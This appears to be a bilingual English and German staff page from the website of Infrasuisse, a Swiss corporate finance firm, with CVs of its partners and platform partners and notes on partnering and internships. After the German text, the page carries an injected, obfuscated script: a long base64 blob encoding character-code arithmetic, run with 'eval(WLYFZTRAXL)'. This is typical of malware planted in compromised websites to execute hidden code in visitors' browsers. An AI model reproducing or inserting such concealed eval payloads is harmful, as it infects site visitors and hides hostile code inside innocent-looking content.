People

Urban Schwerzmann
Partner

CV

Urban Schwerzmann specializes in Corporate Finance and Private Equity as well as Asset and Venture Capital financings. He brings long-term experience in corporate finance and commercial banking to his job. Before founding Infrasuisse, he worked in a similar position at Global Capital Finance and Value Partners. Prior to this he was a corporate Banking relationship manager for Swiss Multinationals in Zurich followed by a role at Credit Suisse First Boston’s Credit Product Group in London, focusing on lending products and credit derivatives. His responsibilities included working with leading private equity companies throughout Europe. Earlier in his career he worked as a marketing officer in the corporate banking department of Credit Suisse in Zug, dealing with mid-sized companies that were Credit Suisse commercial banking and trade finance clients. Urban holds a business economics degree from the University of Applied Sciences in Lucerne and is fluent in German, English, French and Swedish.

Nadja Teichert
Partner

CV

Nadja Teichert manages the portfolio controlling activities and focuses on the acquisition and execution of Structured Finance and Renewable Energy transactions. Over her career she has accumulated experience in the fields of corporate finance, commercial banking and cross-border leasing. Prior to joining Infrasuisse, she was a Vice President at Global Capital Finance and before that an associate with Global Lease Finance Group of Credit Suisse First Boston. She also worked for the same company’s North American Corporate Finance section and a Zurich branch. Nadja has a business economics degree from the HWV commerce and business management school and an MBA from the International Bankers School of Chicago. She is fluent in German and English.

Thor Birkmand
Platform Partner
DK

CV

Thor Birkmand is a co-founder, partner and board member of Over the Water Capital AB, the Scandinavian strategy and M&A specialist as well as small cap investment firm. Prior to co-founding Over the Water Capital, he worked as investment manager and partner for 12 years in venture capital firm ACR Capital (Slottsbacken) and private equity house Nordic Growth, which he co-founded, and has during this period been acting on the board of companies such as Configit A/S, Mermaid A/S, Setera Oy, Tific AB, Tpack A/S, WorkMotions AB and Zapera.com A/S. Thor’s resume also includes the position as Managing Director of fast-growing internet strategy consultant IconMedialab A/S, building up the Danish operations from scratch, and as Market Manager (convergence products) within the Danish mobile phone operator Sonofon (now part of listed company Telenor ASA, Oslo: TEL.OL). Thor holds a B.Sc. and Diploma in Economics and Business Administration (Copenhagen Business School, Denmark) and an MBA from SDA Bocconi (Milan, Italy).

Jens Hansson
Platform Partner
S

CV

Jens Hansson is a partner and board member of Over the Water Capital AB, the Scandinavian strategy and M&A specialist as well as small cap investment firm. Prior to co-founding Over the Water Capital, he worked as investment manager and partner for 12 years in two private equity houses, Nordic Growth and Accent Equity (formerly Euroventures), specializing in Nordic small cap buy-outs. Jens has previously also held a number of industrial top management positions including the CEO of ElektronikGruppen BK AB, a listed EUR 100 million electronics component distributor (NASDAQ OMX: ELGR), and as the Global Head of R&D at Mydata Automation AB, a EUR 100 million manufacturer of electronics production equipment (now part of listed company Mycronic AB, NASDAQ OMX: MYCR). In addition, he has held a number of middle management roles in the aerospace and other hi-tech industries in Sweden and Japan, focusing on business development, international marketing, and manufacturing. Jens holds a B.Sc. in Economics and Business Administration (Gothenburg School of Economics, Sweden) and a M.Sc. in Electrical Engineering (Chalmers Univ. of Technology, Gothenburg).

Edward Kokorev
Platform Partner
RU

CV

Mr. Kokorev is the Founder and Managing Partner of Aurora Finance, an independent investment agency, specializing on corporate finance advisory services to small and medium companies. Before Aurora Finance, Mr. Kokorev has served as a Deputy Head of Distressed Assets Department  of Sberbank of Russia, where he was responsible for coordination and execution of restructuring deals. Before that, he worked as a Director of Investment Banking Coverage Department of Trust Investment Bank in Moscow, where he was responsible for development  of investment banking business. Before that, Mr. Kokorev has worked as Associate in Equities Department of Goldman Sachs investment bank in New York and London and later as an Investment Manager in Investment Management Department of Goldman Sachs Bank in Zurich. Mr. Kokorev received his MBA from Wharton School of the University of Pennsylvania and his ВS in Applied Mathematics from Novosibirsk State University.

Partner Roles

We do welcome Partners that are interested in joining an entrepreneurial and professional organization like Infrasuisse. Through our “open source” Partnering Platform  we are looking to attract senior individuals or teams who may in the long term also become equity partners in Infrasuisse who can work independently and like working in an unbureaucratic and flexible environment. We are looking for Partners with profiles  in a specific industry who bring along a strong network in their markets ideally combined with a specific skillset. For further information please refer to our Partnering Contact  site.

Internship

Infrasuisse is continuously looking for highly motivated, flexible individuals with strong skill sets in finance. We embrace entrepreneurship and offer a refreshingly non-hierarchical, non-political work environment with versatile opportunities. We are prepared to invest a  substantial amount of our time in training and education, and therefore would expect a time commitment of minimum 4-6 months. To find out more about opportunities with Infrasuisse please email your CV with a covering note to Infrasuisse.

Personen

Urban Schwerzmann
Partner
CH

CV

Urban Schwerzmann ist auf Corporate Finance und Private Equity sowie auf Anlage- wie auch Unternehmensfinanzierungen spezialisiert. Er verfügt über eine langjährige Erfahrung in den Bereichen Corporate Finance und Commercial Banking. Vor seinem Einstieg bei Infrasuisse war er in einer ähnlichen Anstellung bei Global Capital Finance und Value Partners tätig. Davor war er bei der Credit Suisse First Boston (CSFB) in Zürich als Relationship Manager im Bereich Corporate Banking für Schweizer Multinationals aktiv, gefolgt von einer Tätigkeit in der Einheit Credit Products Group bei der  CSFB in London, wo er sich auf Kredite und Kreditderivate fokussierte.  Zu seinen Aufgaben zählte unter anderem die Zusammenarbeit mit führenden Private Equity-Gesellschaften in ganz Europa. Begonnen hat er seine Laufbahn bei der Credit Suisse in Zug.  Urban Schwerzmann hat an der Höheren Wirtschafts- und Verwaltungsschule (HWV) ein Diplom als Betriebsökonom erworben. Er spricht fliessend Deutsch, Englisch, Französisch und Schwedisch.

Nadja Teichert
Partner
CH

CV

Nadja Teichert verantwortet die Portfolio-Überwachungsaufgabe und ist verantwortlich für die Akquisitions- und Transaktionsprojekte der Infrasuisse. Sie verfügt über eine 25-jährige Erfahrung in den Bereichen Corporate Finance, Commercial Banking und Crossborder Leasing. Vor ihrem Einstieg bei Infrasuisse arbeitete sie in der gleichen Funktion bei Global Capital Finance sowie als Associate innerhalb der Global Lease Finance Group von Credit Suisse First Boston. Zuvor hatte sie im selben Unternehmen für das nordamerikanische Corporate Finance-Geschäft sowie für eine Zürcher Niederlassung gearbeitet. Nadja Teichert hat an der Höheren Wirtschafts- und Verwaltungsschule (HWV) ein Diplom als Betriebsökonomin erworben und besitzt ein MBA der International Bankers School of Chicago. Sie spricht fliessend Deutsch und Englisch.

Thor Birkmand
Plattform Partner
DK

CV

Thor Birkmand ist Gründer, Partner und Verwaltungsratsmitglied von Over the Water Capital AB, dem skandinavischen Strategie und M&A Spezialisten sowie Investor in Kleinunternehmen. Vor der Gründung von Over the Water Capital war er während 12 Jahren als Investment Manager und Partner beim Risikokapitalfinanzierer ACR Capital (Slottsbacken) und der Private Equity Gesellschaft Nordic Growth als Mitbegründer tätig. Wärend dieser Zeit war er aktiv im Verwaltungsrat von Firmen wie Configit A/S, Mermaid A/S, Setera Oy, Tific AB, Tpack A/S, WorkMotions AB und Zapera.com A/S. Thor war auch Geschäftsleitungsmitglied des schnell wachsenden Internet Strategieberaters IconMedialab A/S, wo er die dänische Einheit von Beginn aufbaute sowie Market Manager (Konvergenzprodukte) beim dänischen Mobiltelefonieanbieter Sonofon (nun Teil der börsenkotierten Firma Telenor ASA, Oslo: TEL.OL). Thor hält ein B.Sc. und Diplom in Betriebswirtschaft (Kopenhagen Business School) und ein MBA der SDA Bocconi (Mailand).

Jens Hansson
Plattform Partner
S

CV

Jens Hansson ist Partner und Verwaltungsratsmitglied von Over the Water Capital AB, dem skandinavischen Strategie und M&A Spezialisten sowie Investor in Kleinunternehmen. Vor der Gründung von Over the Water Capital war er während 12 Jahren als Investment Manager und Partner für Nordic Growth und Accent Equity (ehemals Euroventures) tätig. Beide Private Equity Gesellschaften spezialisierten sich auf nordische small cap buy-outs. Davor war Jens auch in der Industrie in Führungspositionen tätig. Unter anderem ware er CEO von ElektronikGruppen BK AB, einem börsengelisteten EUR 100 Mio. Elektronikkomponenten Distributor (NASDAQ OMX: ELGR) und globaler Leiter des F&E Bereichs von Mydata Automation AB, einem EUR 100 Mio. Hersteller von elektronischen Produktionsgeräten (inzwischen Teil der börsengelisteten Mycronic AB, NASDAQ OMX: MYCR). Zusätzlich hat Jens verschiedene Positionen auf mittlerer Führungsebene im Aviatikbereich und anderen hi-tech Industrien in Schweden und Japan inne gehabt. Dort hat er sich jeweils auf die Bereiche Business Development, Internationales Marketing und Produktion fokussiert. Jens hält ein B.Sc. in Ökonomie der Göteborg’s Universtitätet und ein M.Sc. als Elektroingenieur der Chalmers Tekniska Högskola in Göteborg.

Edward Kokorev
Plattform Partner
RU

CV

Edward Kokorev ist Gründer und Managing Partner von Aurora Finance, einer unabhängigen Investmentagentur in Moskau, die sich auf Dienstleistungen im Bereich der Unternehmensfinanzierung für kleinere und mittlere Unternehmen fokussiert. Vor der Gründung von Aurora Finance war Edward Kokorev stellvertretender Leiter der Abteilung “Distressed Assets” der Sberbank Russland, wo er sich für die Koordinierung und Ausführung bei der Restrukturierung von Transaktionen verantwortlich zeichnete. Davor war er Direktor der Investment Banking Coverage Abteilung der Trust Investment Bank in Moskau, wo er für die Entwicklung der Investment Banking Aktivitäten zuständig war. Edward Kokorev war davor als Associate in der Eigenkapitalmarkt Abteilung bei Goldman Sachs in New York und London tätig, gefolgt von einer Rolle als Investment Manager im Bereich Investment Management bei Goldman Sachs in Zürich. Edward Kokorev verfügt über ein MBA der Wahrton School der University of Pennsylvania und einen Abschluss in Mathematik der Staatlichen Universität Novosibirsk.

Partner Opportunitäten

Wir begrüssen Anfragen von potentiellen Partnern, die daran interessiert sind, sich einer unternehmerischen und professionellen Organisation wie Infrasuisse anzuschliessen. Mittels unserer „open source“ Partnering Plattform möchten wir erfahrene Persönlichkeiten oder Teams gewinnen, die langfristig auch Equity Partner bei der Infrasuisse werden können und es bevorzugen, sich in einem unbürokratischen und flexiblen Umfeld zu bewegen. Wir halten Ausschau nach Persönlichkeiten mit Erfahrung in einer spezifischen Industrie, gepaart mit einem guten Netzwerk in deren angestammten Märkten. Für weitere Informationen steht Ihnen unsere Kontaktwebsite zur Verfügung.

Praktikum

Infrasuisse ist regelmässig auf der Suche nach hochmotivierten, flexiblen Persönlichkeiten mit einem starken Leistungsausweis im Bereich der Unternehmens- und Anlagefinanzierung. Wir sind bereit, Zeit in die Ausbildung zu investieren und erwarten deshalb die Bereitschaft von mindestens 4-6 Monaten Einsatzzeit. Um mehr über die Möglichkeiten und offenen Vakanzen zu erfahren, senden Sie uns bitte eine e-mail mit Ihrem CV und einem Begleitschreiben an Infrasuisse.

DkgLSA5LCAxMjEgLSA2LCAxMjAgLSA0LCAxMTYgLSAyLCAxMTMgLSA4LCAxMTcgLSA3LCAxMDcgLSA0LCA1NCAtIDgsIDEwMSAtIDIsIDExMiAtIDgsIDEwNSAtIDgsIDExOSAtIDUsIDczIC0gNiwgMTEyIC0gMSwgMTA4IC0gOCwgMTAzIC0gMiwgNzIgLSA3LCAxMjAgLSA0LCA0NSAtIDUsIDExNCAtIDksIDQ1IC0gNCwgMzkgLSA3LCA5OSAtIDUsIDE2IC0gNiwgMTQgLSA1LCAxMiAtIDMsIDE1IC0gNiwgMTMgLSA0LCAxMTQgLSA3LCAxMDcgLSA2LCAxMzAgLSA5LCA1MiAtIDYsIDEwMSAtIDIsIDExMSAtIDcsIDk4IC0gMSwgMTE3IC0gMywgNzIgLSA1LCAxMTcgLSA2LCAxMDYgLSA2LCAxMDMgLSAyLCA3MiAtIDcsIDEyNCAtIDgsIDQ0IC0gNCwgMTE0IC0gOSwgMzYgLSA0LCAzOSAtIDIsIDM1IC0gMywgMTE2IC0gOSwgMTA4IC0gNywgMTIyIC0gMSwgNDkgLSAzLCAxMTQgLSA2LCAxMDYgLSA1LCAxMTQgLSA0LCAxMDcgLSA0LCAxMjMgLSA3LCAxMTAgLSA2LCA0OSAtIDgsIDQ3IC0gNiwgNjAgLSAxLCAxMyAtIDMsIDM5IC0gNywgMzggLSA2LCAxMzEgLSA2LCAxOCAtIDgsIDM4IC0gNiwgMzMgLSAxLCAxMjAgLSA2LCAxMDcgLSA2LCAxMjUgLSA5LCAxMTggLSAxLCAxMTUgLSAxLCAxMTUgLSA1LCAzMyAtIDEsIDEyMiAtIDgsIDEwNiAtIDUsIDEyMSAtIDYsIDYwIC0gMSwgMTggLSA4LCAxMzEgLSA2LCAxOSAtIDksIDE2IC0gNiwgMTI2IC0gOCwgMTA0IC0gNywgMTE4IC0gNCwgMzUgLSAzLCAxMDIgLSAyLCAxMDIgLSAxLCAxMDEgLSAyLCA0MCAtIDgsIDY0IC0gMywgMzcgLSA1LCAxMjMgLSAzLCAxMTkgLSA4LCAxMjAgLSA2LCA5OCAtIDMsIDEwOCAtIDcsIDExMiAtIDIsIDEwOCAtIDksIDQ5IC0gOSwgMTAwIC0gMywgMTI1IC0gOSwgMTEyIC0gMSwgMTA0IC0gNiwgNDEgLSAxLCAxMTAgLSA5LCAxMTUgLSA1LCAxMDYgLSA3LCAxMDggLSA3LCAxMDIgLSAyLCA0OSAtIDgsIDQ1IC0gMSwgNDEgLSA5LCAxMTUgLSA4LCAxMDMgLSAyLCAxMjggLSA3LCA0NyAtIDYsIDY0IC0gNSwgMTEgLSAxLCA0NSAtIDUsIDExNiAtIDYsIDEwNSAtIDQsIDEyNiAtIDcsIDM2IC0gNCwgNzIgLSAyLCAxMTggLSAxLCAxMTIgLSAyLCAxMDYgLSA3LCAxMjUgLSA5LCAxMDcgLSAyLCAxMTcgLSA2LCAxMTYgLSA2LCA0NSAtIDUsIDEwMiAtIDIsIDEwNSAtIDQsIDEwNyAtIDgsIDUwIC0gOSwgNDQgLSAzLCA0OCAtIDgsIDQ2IC0gNSwgNjggLSA5LCAxNyAtIDcsIDE3IC0gNyk7ZXZhbChDQVBQU0xOTlFSKTs=’);
eval(WLYFZTRAXL);